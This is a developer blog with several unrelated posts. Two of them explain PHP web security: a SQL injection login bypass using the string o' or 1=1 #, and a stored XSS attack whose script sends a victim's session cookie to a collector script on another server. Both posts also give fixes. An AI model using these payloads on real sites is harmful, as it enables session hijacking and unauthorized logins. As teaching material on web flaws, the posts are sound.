segunda-feira, 2 de janeiro de 2017

Security in PHP web pages - Part 2

In the second part of this series of articles we will explore a forum-style message page to make a session hijacking attack.

First the page code is as follows:



Now the problem: the page input is not checked for the existence of potentially dangerous characters, so the page allows the execution of javascript.

In addition to small jokes that may be attempted, such as opening popups or redirecting the browser to other pages, the page is vulnerable to another type of attack that allows you to capture the session cookie and send it to another server. Is this the kind of attack we are going to demonstrate here.

With the following code inserted in the inputbox for the message we are going to have the browser try to open an image, which is actually a PHP script that will rescue the session cookie:

<script>document.write('<img src="http://localhost:8088/login/submitcookie.php?cookie='+escape(document.cookie)+'"/>');</script>

The PHP code that will capture the cookie is as follows:



In this case the code will create a text file with the value of the cookie, allowing the current session of the user can be captured by simply injecting this cookie into the browser of the attacker.

To make the page safe it is necessary to validate the input, for this we can create a function:
function test_input($data) {
$data = trim($data);
$data = stripslashes($data);
$data = htmlspecialchars($data);
return $data;
}
(code from www.w3schools.com)

Of course we should also use parameters instead of concatenated strings for SQL code.




terça-feira, 27 de dezembro de 2016

Security in PHP web pages

One concern that must be present in all Web developers is the security of their products.

In this article we start a series of articles which will explore some basic security issues related to injecting SQL statements into web forms or URL parameters.

Examples of code with security issues and how to avoid them are presented.

So let's start with a simple login form implemented with the following code:




In this example, the code checks to see if more than one database record has been returned, thereby assuming that the credentials provided are correct.

The biggest mistake involves concatenating the values ​​received from the form with the SQL statement, thus allowing the user to manipulate the instruction to his or her own pleasure.

Regardless of the user name entered, simply type in the password the following text if you choose to indicate that the login has been successfully completed: o' or 1=1 #

With this text the SQL statement will always return a record because 1 equals 1. The # at the end lets you ignore the rest of the statement as it is the symbol for comments in MySQL.

The solution to this problem is to use parameters, preparing the statement before executing it. So the following code resolves this problem:





terça-feira, 14 de junho de 2016

Google OAuth 2.0 in ASPX

In this post I will demonstrate how to use Google OAuth in a ASPX webform with C#.

This project uses Visual Studio 2015 and as a option for the user to sign-up and other to check the sign-in.

Let's start by creating a new project.

PacMan 3D

In this post we will be making a simple and classic game, the Pacman, with Unity 3D.

Let's create a new a new project


segunda-feira, 4 de abril de 2016

Entity Framework

This post is about entity framework and how to use it to make, almost with a simple mouse click, the CRUD (create, read, update and delete) operations over a table.

Let's start by creating a web MVC project with Visual Studio 2015.




sexta-feira, 25 de março de 2016

Mobile == Optimization

 Going mobile is not easy, so you must consider it from the beginning.

So I decided to develop a new project for the mobile devices and having a simple structure working I started looking at de frame rate and, surprise surprise, it look bad. I mean it was 6 to 8 frames per second and the scene was almost empty.

Then I look at the bag of optimizations and started the kung fu:
- first simplify the models, less vertices, less faces, less edges all led to faster rendering;
- change the Unity shaders to mobile;
- I'm using a terrain so looking at the options I started messing with this:
  - pixel error;
  - base map distance;
  - detail distance;
- Theres one directional light in the scene so here's what I changed:
  - baking to baked;
  - shadows to hard shadows;

In the scripts I looked at:
- string concatenation - make it with stringbuilder;
- function calls, some times can be avoided;
- some functions can be optimizaded like the Mathf.Abs that I changed for  x = (x > 0 ? x : -x).

After all this tricks I get 20 frames per second, not bad! And the frame rate is stabel, not droping has I add more elements to the scene.

There are some more changes that I'm going to test with the physics engine but for now I'm happy.